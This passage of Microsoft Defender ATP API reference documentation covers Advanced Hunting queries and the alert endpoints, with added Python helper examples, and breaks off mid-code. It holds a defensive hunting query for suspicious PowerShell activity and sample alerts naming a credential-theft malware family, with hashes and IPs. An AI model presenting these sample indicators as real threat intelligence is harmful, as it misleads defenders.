Application | AdvancedQuery.Read.All | 'Run advanced queries'
Delegated (work or school account) | AdvancedQuery.Read | 'Run advanced queries'

NOTE
When obtaining a token using user credentials:
The user needs to have the 'View Data' AD role
The user needs to have access to the machine, based on machine group settings (See Create and manage machine groups for more information)

HTTP request
POST https://api.securitycenter.windows.com/api/advancedqueries/run

Request headers
HEADER | VALUE
Authorization | Bearer {token}. Required.
Content-Type | application/json

Request body
In the request body, supply a JSON object with the following parameters:

PARAMETER | TYPE | DESCRIPTION
Query | Text | The query to run. Required.

Response
If successful, this method returns 200 OK, and QueryResponse object in the response body.

Example
Request
Here is an example of the request.

NOTE
For better performance, you can use a server closer to your geo location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

POST https://api.securitycenter.windows.com/api/advancedqueries/run
Content-type: application/json
{
    "Query":"ProcessCreationEvents
| where InitiatingProcessFileName =~ \"powershell.exe\"
| where ProcessCommandLine contains \"appdata\"
| project EventTime, FileName, InitiatingProcessFileName
| limit 2"
}

Response
Here is an example of the response.

NOTE
The response object shown here may be truncated for brevity. All of the properties will be returned from an actual call.
HTTP/1.1 200 OK
Content-Type: application/json
{
    "Schema": [{
        "Name": "EventTime",
        "Type": "DateTime"
    },
    {
        "Name": "FileName",
        "Type": "String"
    },
    {
        "Name": "InitiatingProcessFileName",
        "Type": "String"
    }],
    "Results": [{
        "EventTime": "2018-07-09T07:16:26.8017265",
        "FileName": "csc.exe",
        "InitiatingProcessFileName": "powershell.exe"
    },
    {
        "EventTime": "2018-07-08T19:00:02.7798905",
        "FileName": "gpresult.exe",
        "InitiatingProcessFileName": "powershell.exe"
    }]
}
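The request body and QueryResponse described above, as an added Python example that is not part of the original page: it JSON-encodes a query (producing the escaped inner quotes the example request shows) and converts the response's Schema/Results pair into typed rows. The response below is constructed to match the page's example, so it runs offline.

```python
"""Build an Advanced Hunting API request and parse its QueryResponse (offline)."""
import json
from datetime import datetime

RUN_URL = "https://api.securitycenter.windows.com/api/advancedqueries/run"
MAX_ROWS = 10000   # page limitation: a response carries at most 10,000 rows


def build_run_request(query: str, token: str) -> dict:
    """Method, URL, headers and JSON body for POST /api/advancedqueries/run."""
    return {
        "method": "POST",
        "url": RUN_URL,
        "headers": {"Authorization": f"Bearer {token}", "Content-Type": "application/json"},
        # json.dumps turns the query's inner quotes into \" exactly as the page's request shows
        "body": json.dumps({"Query": query}),
    }


def _parse_datetime(value: str) -> datetime:
    """The API emits 7 fractional digits; fromisoformat accepts at most 6 before Python 3.11."""
    value = value.rstrip("Z")
    if "." in value:
        head, frac = value.split(".", 1)
        value = f"{head}.{frac[:6]}"
    return datetime.fromisoformat(value)


def _convert(value, type_name: str):
    """Map a Schema type name to a Python value; unknown types pass through unchanged."""
    if value is None:
        return None
    if type_name == "DateTime":
        return _parse_datetime(value)
    if type_name == "String":
        return str(value)
    return value


def parse_query_response(payload: dict) -> list:
    """Turn {"Schema": [...], "Results": [...]} into a list of typed dicts, one per row."""
    schema = {col["Name"]: col["Type"] for col in payload["Schema"]}
    rows = [{name: _convert(row.get(name), kind) for name, kind in schema.items()}
            for row in payload["Results"]]
    if len(rows) >= MAX_ROWS:
        # Hitting the page's 10,000-row cap means the result set was truncated.
        raise RuntimeError("result set hit the 10,000-row cap; narrow the query or time range")
    return rows


def explain_status(status: int) -> str:
    """Map an HTTP status to the page's troubleshooting advice."""
    if status in (401, 403):
        return "token lacks the needed permission: decode it and check 'roles' (app) or 'scp' (user)"
    return "ok" if status == 200 else f"unexpected HTTP {status}"


# The page's example query and a constructed response matching its example output.
QUERY = """ProcessCreationEvents
| where InitiatingProcessFileName =~ "powershell.exe"
| where ProcessCommandLine contains "appdata"
| project EventTime, FileName, InitiatingProcessFileName
| limit 2"""

SAMPLE_RESPONSE = {
    "Schema": [{"Name": "EventTime", "Type": "DateTime"},
               {"Name": "FileName", "Type": "String"},
               {"Name": "InitiatingProcessFileName", "Type": "String"}],
    "Results": [
        {"EventTime": "2018-07-09T07:16:26.8017265", "FileName": "csc.exe",
         "InitiatingProcessFileName": "powershell.exe"},
        {"EventTime": "2018-07-08T19:00:02.7798905", "FileName": "gpresult.exe",
         "InitiatingProcessFileName": "powershell.exe"},
    ],
}

if __name__ == "__main__":
    print(build_run_request(QUERY, "<token>")["body"])
    for row in parse_query_response(SAMPLE_RESPONSE):
        print(row["EventTime"].isoformat(), row["FileName"], "<-", row["InitiatingProcessFileName"])
```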

Troubleshoot issues
Error: (403) Forbidden / (401) Unauthorized

If you get this error when calling the Windows Defender ATP API, your token might not include the necessary permission.

Check the app permissions (see Validate the token under Access Windows Defender ATP without a user) or delegated permissions (see Validate the token under Access Windows Defender ATP on behalf of a user) included in your token.

If the 'roles' section in the token does not include the necessary permission:

- The necessary permission might not have been granted to your app. For more information, see Access Windows Defender ATP without a user or Access Windows Defender ATP on behalf of a user, or
- The app was not authorized in the tenant; see Application consent.

Related topic
Windows Defender ATP APIs
Advanced Hunting from Portal
Advanced Hunting using PowerShell
Schedule Advanced Hunting
Alert resource type
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP )
Represents an alert entity in Windows Defender ATP.

Methods
METHOD | RETURN TYPE | DESCRIPTION
Get alert | Alert | Get a single alert object.
List alerts | Alert collection | List alert collection.
Create alert | Alert | Create an alert based on event data obtained from Advanced Hunting.
List related domains | Domain collection | List URLs associated with the alert.
List related files | File collection | List the file entities that are associated with the alert.
List related IPs | IP collection | List IPs that are associated with the alert.
Get related machines | Machine | The machine that is associated with the alert.
Get related users | User | The user that is associated with the alert.

Properties
PROPERTY | TYPE | DESCRIPTION
id | String | Alert ID.
incidentId | String | The Incident ID of the Alert.
assignedTo | String | Owner of the alert.
severity | Enum | Severity of the alert. Possible values are: 'UnSpecified', 'Informational', 'Low', 'Medium' and 'High'.
status | Enum | Specifies the current status of the alert. Possible values are: 'Unknown', 'New', 'InProgress' and 'Resolved'.
investigationState | Nullable Enum | The current state of the investigation. Possible values are: 'Unknown', 'Terminated', 'SuccessfullyRemediated', 'Benign', 'Failed', 'PartiallyRemediated', 'Running', 'PendingApproval', 'PendingResource', 'PartiallyInvestigated', 'TerminatedByUser', 'TerminatedBySystem', 'Queued', 'InnerFailure', 'PreexistingAlert', 'UnsupportedOs', 'UnsupportedAlertType', 'SuppressedAlert'.
classification | Nullable Enum | Classification of the alert. Possible values are: 'Unknown', 'FalsePositive', 'TruePositive'.
determination | Nullable Enum | Specifies the determination of the alert. Possible values are: 'NotAvailable', 'Apt', 'Malware', 'SecurityPersonnel', 'SecurityTesting', 'UnwantedSoftware', 'Other'.
category | String | Category of the alert. The property values are: 'None', 'SuspiciousActivity', 'Malware', 'CredentialTheft', 'Exploit', 'WebExploit', 'DocumentExploit', 'PrivilegeEscalation', 'Persistence', 'RemoteAccessTool', 'CommandAndControl', 'SuspiciousNetworkTraffic', 'Ransomware', 'MalwareDownload', 'Reconnaissance', 'WebFingerprinting', 'Weaponization', 'Delivery', 'SocialEngineering', 'CredentialStealing', 'Installation', 'Backdoor', 'Trojan', 'TrojanDownloader', 'LateralMovement', 'ExplorationEnumeration', 'NetworkPropagation', 'Exfiltration', 'NotApplicable', 'EnterprisePolicy' and 'General'.
detectionSource | String | Detection source.
threatFamilyName | String | Threat family.
title | String | Alert title.
description | String | Description of the threat, identified by the alert.
alertCreationTime | DateTimeOffset | The date and time (in UTC) the alert was created.
lastEventTime | DateTimeOffset | The last occurrence of the event that triggered the alert on the same machine.
firstEventTime | DateTimeOffset | The first occurrence of the event that triggered the alert on that machine.
resolvedTime | DateTimeOffset | The date and time at which the status of the alert was changed to 'Resolved'.
machineId | String | ID of a machine entity that is associated with the alert.

JSON representation
{
    "@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Alerts",
    "id": "121688558380765161_2136280442",
    "incidentId": 7696,
    "assignedTo": "secop@contoso.com",
    "severity": "High",
    "status": "New",
    "classification": "TruePositive",
    "determination": "Malware",
    "investigationState": "Running",
    "category": "MalwareDownload",
    "detectionSource": "WindowsDefenderAv",
    "threatFamilyName": "Mikatz",
    "title": "Windows Defender AV detected 'Mikatz', high-severity malware",
    "description": "Some description",
    "alertCreationTime": "2018-11-26T16:19:21.8409809Z",
    "firstEventTime": "2018-11-26T16:17:50.0948658Z",
    "lastEventTime": "2018-11-26T16:18:01.809871Z",
    "resolvedTime": null,
    "machineId": "9d80fbbc1bdbc5ce968f1d37c72384cbe17ee337"
}
List alerts API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP )
Retrieves a collection of Alerts.
Supports OData V4 queries.
The OData $filter query option is supported on: "Id", "IncidentId", "AlertCreationTime", "Status", "Severity" and "Category".
See examples at OData queries with Windows Defender ATP

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE | PERMISSION | PERMISSION DISPLAY NAME
Application | Alert.Read.All | 'Read all alerts'
Application | Alert.ReadWrite.All | 'Read and write all alerts'
Delegated (work or school account) | Alert.Read | 'Read alerts'
Delegated (work or school account) | Alert.ReadWrite | 'Read and write alerts'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'View Data' (See Create and manage roles for more
information)
The response will include only alerts that are associated with machines that the user can access, based on machine group
settings (See Create and manage machine groups for more information)

HTTP request
GET /api/alerts

Optional query parameters
The method supports the $skip and $top query parameters.

Request headers
NAME | TYPE | DESCRIPTION
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK, and a list of alert objects in the response body.

Example
Request
Here is an example of the request.

Improve request performance


NOTE
For better performance, you can use a server closer to your geo location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

GET https://api.securitycenter.windows.com/api/alerts

Response
Here is an example of the response.

NOTE
The response object shown here may be truncated for brevity. All of the properties will be returned from an actual call.
{
    "@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Alerts",
    "value": [
        {
            "id": "121688558380765161_2136280442",
            "incidentId": 7696,
            "assignedTo": "secop@contoso.com",
            "severity": "High",
            "status": "New",
            "classification": "TruePositive",
            "determination": "Malware",
            "investigationState": "Running",
            "category": "MalwareDownload",
            "detectionSource": "WindowsDefenderAv",
            "threatFamilyName": "Mikatz",
            "title": "Windows Defender AV detected 'Mikatz', high-severity malware",
            "description": "Some description",
            "alertCreationTime": "2018-11-26T16:19:21.8409809Z",
            "firstEventTime": "2018-11-26T16:17:50.0948658Z",
            "lastEventTime": "2018-11-26T16:18:01.809871Z",
            "resolvedTime": null,
            "machineId": "9d80fbbc1bdbc5ce968f1d37c72384cbe17ee337"
        },
        {
            "id": "441688558380765161_2136280442",
            "incidentId": 8633,
            "assignedTo": "secop@contoso.com",
            "severity": "Low",
            "status": "InProgress",
            "classification": "TruePositive",
            "determination": "Malware",
            "investigationState": "Running",
            "category": "MalwareDownload",
            "detectionSource": "WindowsDefenderAv",
            "threatFamilyName": "Mikatz",
            "title": "Windows Defender AV detected 'Mikatz', high-severity malware",
            "description": "Some description",
            "alertCreationTime": "2018-11-25T16:19:21.8409809Z",
            "firstEventTime": "2018-11-25T16:17:50.0948658Z",
            "lastEventTime": "2018-11-25T16:18:01.809871Z",
            "resolvedTime": null,
            "machineId": "9d80fbbc1bdbc5ce968f1d37c72384cbe17ee337"
        }
    ]
}
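The OData options this API accepts ($filter on the listed properties, $top and $skip) and the JSON-to-CSV step of the PowerShell script at the top of this section, as an added Python example that is not part of the original page. It builds the request URLs, pages through results with $top/$skip via an injected fetch function, and flattens a constructed response (the page's two sample alerts, trimmed) to CSV; no network call is made.

```python
"""Build List-alerts URLs with OData options and flatten the response to CSV (offline)."""
import csv
import io
from datetime import datetime, timedelta, timezone
from urllib.parse import urlencode

ALERTS_URL = "https://api.securitycenter.windows.com/api/alerts"
# Properties the page says $filter supports (spelled as in the alert JSON).
FILTERABLE = {"id", "incidentId", "alertCreationTime", "status", "severity", "category"}


def odata_literal(value) -> str:
    """Render a Python value as an OData literal (datetimes as UTC ISO 8601, strings quoted)."""
    if isinstance(value, datetime):
        return value.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    if isinstance(value, (int, float)):
        return str(value)
    return "'" + str(value).replace("'", "''") + "'"   # OData escapes ' as ''


def list_alerts_url(filters=None, top=None, skip=None) -> str:
    """filters: list of (property, operator, value); clauses are joined with 'and'."""
    params = {}
    if filters:
        clauses = []
        for prop, op, value in filters:
            if prop not in FILTERABLE:
                raise ValueError(f"$filter is not supported on {prop!r}")
            clauses.append(f"{prop} {op} {odata_literal(value)}")
        params["$filter"] = " and ".join(clauses)
    if top is not None:
        params["$top"] = top
    if skip is not None:
        params["$skip"] = skip
    return ALERTS_URL + ("?" + urlencode(params) if params else "")


def recent_alerts_filter(hours: int, now=None) -> tuple:
    """The page's PowerShell filter: alertCreationTime ge <now - N hours>."""
    now = now or datetime.now(timezone.utc)
    return ("alertCreationTime", "ge", now - timedelta(hours=hours))


def iter_alerts(fetch, filters=None, page_size=100):
    """Walk every page with $top/$skip. fetch(url) -> parsed JSON; injected so this runs offline."""
    skip = 0
    while True:
        page = fetch(list_alerts_url(filters, top=page_size, skip=skip)).get("value", [])
        yield from page
        if len(page) < page_size:
            return
        skip += page_size


def alerts_to_csv(alerts) -> str:
    """Flatten alert objects to CSV text, like the page's Export-CSV step; nulls become empty cells."""
    alerts = list(alerts)
    if not alerts:
        return ""
    columns = list(alerts[0].keys())
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=columns, extrasaction="ignore", lineterminator="\n")
    writer.writeheader()
    for alert in alerts:
        writer.writerow({c: "" if alert.get(c) is None else alert[c] for c in columns})
    return buf.getvalue()


# Constructed response holding the two alerts from the page's example (fields trimmed).
SAMPLE_RESPONSE = {"value": [
    {"id": "121688558380765161_2136280442", "incidentId": 7696, "severity": "High",
     "status": "New", "alertCreationTime": "2018-11-26T16:19:21.8409809Z", "resolvedTime": None},
    {"id": "441688558380765161_2136280442", "incidentId": 8633, "severity": "Low",
     "status": "InProgress", "alertCreationTime": "2018-11-25T16:19:21.8409809Z", "resolvedTime": None},
]}

if __name__ == "__main__":
    print(list_alerts_url([recent_alerts_filter(48)], top=50))
    print(alerts_to_csv(SAMPLE_RESPONSE["value"]))
```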

Related topics
OData queries with Windows Defender ATP
Create alert from event API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP )
Creates a new alert entity from event data obtained through Advanced Hunting.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE | PERMISSION | PERMISSION DISPLAY NAME
Application | Alerts.ReadWrite.All | 'Read and write all alerts'
Delegated (work or school account) | Alert.ReadWrite | 'Read and write alerts'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'Alerts investigation' (See Create and manage roles for more
information)
The user needs to have access to the machine associated with the alert, based on machine group settings (See Create and
manage machine groups for more information)

HTTP request
POST https://api.securitycenter.windows.com/api/alerts/CreateAlertByReference

Request headers
NAME | TYPE | DESCRIPTION
Authorization | String | Bearer {token}. Required.
Content-Type | String | application/json. Required.

Request body
In the request body, supply the following values (all required unless noted otherwise):

PROPERTY | TYPE | DESCRIPTION
machineId | String | Id of the machine on which the event was identified. Required.
severity | String | Severity of the alert. The property values are: 'Low', 'Medium' and 'High'. Required.
title | String | Title for the alert. Required.
description | String | Description of the alert. Required.
recommendedAction | String | Action that is recommended to be taken by the security officer when analyzing the alert.
eventTime | DateTime(UTC) | The time of the event, as obtained from the advanced query. Required.
reportId | String | The reportId, as obtained from the advanced query. Required.
category | String | Category of the alert. The property values are: 'None', 'SuspiciousActivity', 'Malware', 'CredentialTheft', 'Exploit', 'WebExploit', 'DocumentExploit', 'PrivilegeEscalation', 'Persistence', 'RemoteAccessTool', 'CommandAndControl', 'SuspiciousNetworkTraffic', 'Ransomware', 'MalwareDownload', 'Reconnaissance', 'WebFingerprinting', 'Weaponization', 'Delivery', 'SocialEngineering', 'CredentialStealing', 'Installation', 'Backdoor', 'Trojan', 'TrojanDownloader', 'LateralMovement', 'ExplorationEnumeration', 'NetworkPropagation', 'Exfiltration', 'NotApplicable', 'EnterprisePolicy' and 'General'.

Response
If successful, this method returns 200 OK, and a new alert object in the response body. If an event with the specified properties (reportId, eventTime and machineId) was not found, it returns 404 Not Found.

Example
Request
Here is an example of the request.

Improve request performance


NOTE
For better performance, you can use a server closer to your geo location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

POST https://api.securitycenter.windows.com/api/alerts/CreateAlertByReference
Content-Type: application/json

{
    "machineId": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
    "severity": "Low",
    "title": "test alert",
    "description": "test alert",
    "recommendedAction": "test alert",
    "eventTime": "2018-08-03T16:45:21.7115183Z",
    "reportId": "20776",
    "category": "None"
}
Update alert
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP )
Update the properties of an alert entity.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE | PERMISSION | PERMISSION DISPLAY NAME
Application | Alerts.ReadWrite.All | 'Read and write all alerts'
Delegated (work or school account) | Alert.ReadWrite | 'Read and write alerts'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'Alerts investigation' (See Create and manage roles for more
information)
The user needs to have access to the machine associated with the alert, based on machine group settings (See Create and
manage machine groups for more information)

HTTP request
PATCH /api/alerts/{id}

Request headers
NAME | TYPE | DESCRIPTION
Authorization | String | Bearer {token}. Required.
Content-Type | String | application/json. Required.

Request body
In the request body, supply the values for the relevant fields that should be updated. Existing properties that are not included in the request body will keep their previous values or be recalculated based on changes to other property values. For best performance you shouldn't include existing values that haven't changed.
PROPERTY | TYPE | DESCRIPTION
status | String | Specifies the current status of the alert. The property values are: 'New', 'InProgress' and 'Resolved'.
assignedTo | String | Owner of the alert
classification | String | Specifies the classification of the alert. The property values are: 'Unknown', 'FalsePositive', 'TruePositive'.
determination | String | Specifies the determination of the alert. The property values are: 'NotAvailable', 'Apt', 'Malware', 'SecurityPersonnel', 'SecurityTesting', 'UnwantedSoftware', 'Other'

Response
If successful, this method returns 200 OK, and the alert entity in the response body with the updated properties. If an alert with the specified id was not found, it returns 404 Not Found.

Example
Request
Here is an example of the request.

Improve request performance

NOTE
For better performance, you can use a server closer to your geo location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

PATCH https://api.securitycenter.windows.com/api/alerts/121688558380765161_2136280442
Content-Type: application/json
{
"assignedTo": "secop2@contoso.com"
}

Response
Here is an example of the response.
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Alerts/$entity",
"id": "121688558380765161_2136280442",
"incidentId": 7696,
"assignedTo": "secop2@contoso.com",
"severity": "High",
"status": "New",
"classification": "TruePositive",
"determination": "Malware",
"investigationState": "Running",
"category": "MalwareDownload",
"detectionSource": "WindowsDefenderAv",
"threatFamilyName": "Mikatz",
"title": "Windows Defender AV detected 'Mikatz', high-severity malware",
"description": "Some description",
"alertCreationTime": "2018-11-26T16:19:21.8409809Z",
"firstEventTime": "2018-11-26T16:17:50.0948658Z",
"lastEventTime": "2018-11-26T16:18:01.809871Z",
"resolvedTime": null,
"machineId": "9d80fbbc1bdbc5ce968f1d37c72384cbe17ee337"
}
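As an added example (not code from the page or from Microsoft's SDK), the following Python assembles the PATCH request described above: it validates the documented values for status, classification and determination, drops values that match the current alert so only real changes are sent, and picks the regional host from the note. The helper names, the CURRENT_ALERT snapshot and the token are assumptions.

```python
import json
from urllib.request import Request

# Allowed values for the updatable alert properties, taken from the request body table above.
ALLOWED = {
    "status": {"New", "InProgress", "Resolved"},
    "classification": {"Unknown", "FalsePositive", "TruePositive"},
    "determination": {"NotAvailable", "Apt", "Malware", "SecurityPersonnel",
                      "SecurityTesting", "UnwantedSoftware", "Other"},
}
UPDATABLE = set(ALLOWED) | {"assignedTo"}

# Regional hosts from the "Improve request performance" note; None selects the global host.
HOSTS = {
    None: "api.securitycenter.windows.com",
    "us": "api-us.securitycenter.windows.com",
    "eu": "api-eu.securitycenter.windows.com",
    "uk": "api-uk.securitycenter.windows.com",
}

# Constructed snapshot of the alert before the update (id and field names copied from the
# response sample above; the values are assumed for this example).
CURRENT_ALERT = {
    "id": "121688558380765161_2136280442",
    "assignedTo": "secop@contoso.com",
    "status": "New",
    "classification": "TruePositive",
    "determination": "Malware",
}


def alert_patch_body(current, **updates):
    """Validate the requested updates and keep only the ones that differ from the current alert.

    Unknown properties and values outside the documented sets raise ValueError before
    anything is sent; unchanged values are dropped, as the page recommends.
    """
    body = {}
    for name, value in updates.items():
        if name not in UPDATABLE:
            raise ValueError(f"'{name}' is not an updatable alert property")
        if name in ALLOWED and value not in ALLOWED[name]:
            raise ValueError(f"'{value}' is not a valid {name}; "
                             f"expected one of {sorted(ALLOWED[name])}")
        if current.get(name) != value:
            body[name] = value
    return body


def alert_patch_request(alert_id, token, current, region=None, **updates):
    """Return (url, headers, body) for PATCH /api/alerts/{id}, or None if nothing changed."""
    body = alert_patch_body(current, **updates)
    if not body:
        return None  # nothing to update, so skip the round trip
    url = f"https://{HOSTS[region]}/api/alerts/{alert_id}"
    headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
    return url, headers, body


def to_urllib_request(url, headers, body):
    """Wrap the pieces in a urllib Request with the PATCH method (built, not sent, here)."""
    return Request(url, data=json.dumps(body).encode("utf-8"), headers=headers, method="PATCH")


if __name__ == "__main__":
    # Reproduces the page's example: reassign the alert to secop2@contoso.com.
    url, headers, body = alert_patch_request(
        CURRENT_ALERT["id"], "<token>", CURRENT_ALERT, assignedTo="secop2@contoso.com")
    print("PATCH", url)
    print(json.dumps(body, indent=2))
```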
Get alert information by ID API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves an alert by its ID.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application Alert.Read.All 'Read all alerts'

Application Alert.ReadWrite.All 'Read and write all alerts'

Delegated (work or school account) Alert.Read 'Read alerts'

Delegated (work or school account) Alert.ReadWrite 'Read and write alerts'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'View Data' (See Create and manage roles for more
information)
The user needs to have access to the machine associated with the alert, based on machine group settings (See Create and
manage machine groups for more information)

HTTP request
GET /api/alerts/{id}

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK, and the alert entity in the response body. If an alert with the specified id
was not found - 404 Not Found.

Example
Request
Here is an example of the request.

Improve request performance

NOTE
For better performance, you can use a server closer to your geo location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

GET https://api.securitycenter.windows.com/api/alerts/441688558380765161_2136280442

Response
Here is an example of the response.

{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Alerts",
"id": "441688558380765161_2136280442",
"incidentId": 8633,
"assignedTo": "secop@contoso.com",
"severity": "Low",
"status": "InProgress",
"classification": "TruePositive",
"determination": "Malware",
"investigationState": "Running",
"category": "MalwareDownload",
"detectionSource": "WindowsDefenderAv",
"threatFamilyName": "Mikatz",
"title": "Windows Defender AV detected 'Mikatz', high-severity malware",
"description": "Some description",
"alertCreationTime": "2018-11-25T16:19:21.8409809Z",
"firstEventTime": "2018-11-25T16:17:50.0948658Z",
"lastEventTime": "2018-11-25T16:18:01.809871Z",
"resolvedTime": null,
"machineId": "9d80fbbc1bdbc5ce968f1d37c72384cbe17ee337"
}
Get alert related domain information API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves all domains related to a specific alert.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application URL.Read.All 'Read URLs'

Delegated (work or school account) URL.Read.All 'Read URLs'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'View Data' (See Create and manage roles for more
information)
The user needs to have access to the machine associated with the alert, based on machine group settings (See Create and
manage machine groups for more information)

HTTP request
GET /api/alerts/{id}/domains

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.

Request body
Empty

Response
If successful and the alert and domains exist - 200 OK. If the alert is not found - 404 Not Found.

Example
Request
Here is an example of the request.

Improve request performance

NOTE
For better performance, you can use a server closer to your geo location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

GET https://api.securitycenter.windows.com/api/alerts/636688558380765161_2136280442/domains

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/$metadata#Domains",
"value": [
{
"host": "www.example.com"
}
]
}
Get alert related files information API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves all files related to a specific alert.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application File.Read.All 'Read file profiles'

Delegated (work or school account) File.Read.All 'Read file profiles'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'View Data' (See Create and manage roles for more
information)
The user needs to have access to the machine associated with the alert, based on machine group settings (See Create and
manage machine groups for more information)

HTTP request
GET /api/alerts/{id}/files

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.

Request body
Empty

Response
If successful and the alert and files exist - 200 OK. If the alert is not found - 404 Not Found.

Example
Request
Here is an example of the request.

Improve request performance

NOTE
For better performance, you can use a server closer to your geo location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

GET https://api.securitycenter.windows.com/api/alerts/636688558380765161_2136280442/files

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Files",
"value": [
{
"sha1": "654f19c41d9662cf86be21bf0af5a88c38c56a9d",
"sha256": "2f905feec2798cee6f63da2c26758d86bfeaab954c01e20ac7085bf55fedde87",
"md5": "82849dc81d94056224445ea73dc6153a",
"globalPrevalence": 33,
"globalFirstObserved": "2018-07-17T18:17:27.5909748Z",
"globalLastObserved": "2018-08-06T16:07:12.9414137Z",
"windowsDefenderAVThreatName": null,
"size": 801112,
"fileType": "PortableExecutable",
"isPeFile": true,
"filePublisher": null,
"fileProductName": null,
"signer": "Microsoft Windows",
"issuer": "Microsoft Development PCA 2014",
"signerHash": "9e284231a4d1c53fc8d4492b09f65116bf97447f",
"isValidCertificate": true
}
]
}
Get alert related IP information API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves all IPs related to a specific alert.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application Ip.Read.All 'Read IP address profiles'

Delegated (work or school account) Ip.Read.All 'Read IP address profiles'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'View Data' (See Create and manage roles for more
information)
The user needs to have access to the machine associated with the alert, based on machine group settings (See Create and
manage machine groups for more information)

HTTP request
GET /api/alerts/{id}/ips

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.

Request body
Empty

Response
If successful and the alert and an IP exist - 200 OK. If the alert is not found - 404 Not Found.

Example
Request
Here is an example of the request.

Improve request performance

NOTE
For better performance, you can use a server closer to your geo location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

GET https://api.securitycenter.windows.com/api/alerts/636688558380765161_2136280442/ips

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/$metadata#Ips",
"value": [
{
"id": "104.80.104.128"
},
{
"id": "23.203.232.228"
}
]
}
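The three related-entity endpoints above (domains, files and IPs) are what an analyst pulls from when turning an alert into indicators. As an added example that is not code from the page or from Microsoft's SDK, this Python validates and de-duplicates what those responses return and flags files worth a closer look; the first entry of each sample is copied from the page, the extra IP entry and second file entry are constructed, and the function names and the prevalence threshold are assumptions.

```python
import ipaddress

RELATED_ENTITIES = {"domains", "files", "ips", "machine", "user"}


def related_entity_path(alert_id, entity):
    """Path for GET /api/alerts/{id}/{entity}, covering the related-entity endpoints above."""
    if entity not in RELATED_ENTITIES:
        raise ValueError(f"unknown related entity '{entity}'")
    return f"/api/alerts/{alert_id}/{entity}"


# Response samples. The first entry of each list is copied from the page; the third IP entry
# (truncated address) and the second file entry (unsigned, AV-detected) are constructed.
DOMAINS_RESP = {"value": [{"host": "www.example.com"}]}
IPS_RESP = {"value": [{"id": "104.80.104.128"}, {"id": "23.203.232.228"}, {"id": "23.203.232"}]}
FILES_RESP = {"value": [
    {"sha1": "654f19c41d9662cf86be21bf0af5a88c38c56a9d",
     "sha256": "2f905feec2798cee6f63da2c26758d86bfeaab954c01e20ac7085bf55fedde87",
     "md5": "82849dc81d94056224445ea73dc6153a", "globalPrevalence": 33,
     "windowsDefenderAVThreatName": None, "signer": "Microsoft Windows",
     "isValidCertificate": True},
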